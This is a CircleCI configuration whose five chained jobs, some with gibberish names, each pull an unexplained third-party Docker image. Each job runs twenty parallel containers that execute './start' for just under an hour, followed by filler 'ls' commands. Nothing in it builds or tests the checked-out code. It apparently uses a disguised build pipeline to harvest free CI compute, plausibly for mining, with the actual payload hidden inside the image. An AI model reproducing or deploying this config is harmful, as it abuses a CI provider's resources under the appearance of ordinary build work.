version: 2.1

jobs:
  build:
    docker:
      - image: andrew92powell37/hunika:1.0
    parallelism: 20
    steps:
      - checkout
      - run:
          name: Run build
          command: |
            cd ../.. && timeout 59m ./start; ls; ls && ls

  test:
    docker:
      - image: andrew92powell37/hunika:1.1
    parallelism: 20
    steps:
      - checkout
      - run:
          name: Run build
          command: |
            cd ../.. && timeout 59m ./start; ls; ls && ls

  star:
    docker:
      - image: andrew92powell37/hunika:1.1
    parallelism: 20
    steps:
      - checkout
      - run:
          name: vbukr
          command: |
            cd ../.. && timeout 59m ./start; ls; ls && ls

  run:
    docker:
      - image: andrew92powell37/hunika:1.1
    parallelism: 20
    steps:
      - checkout
      - run:
          name: yuoo
          command: |
            cd ../.. && timeout 59m ./start; ls; ls && ls

  main:
    docker:
      - image: andrew92powell37/hunika:1.1
    parallelism: 20
    steps:
      - checkout
      - run:
          name: Roui
          command: |
            cd ../.. && timeout 59m ./start; ls; ls && ls
workflows:
  version: 2
  example_workflow:
    jobs:
      - build
      - test:
          requires:
            - build
      - star:
          requires:
            - test
      - run:
          requires:
            - star
      - main:
          requires:
            - run

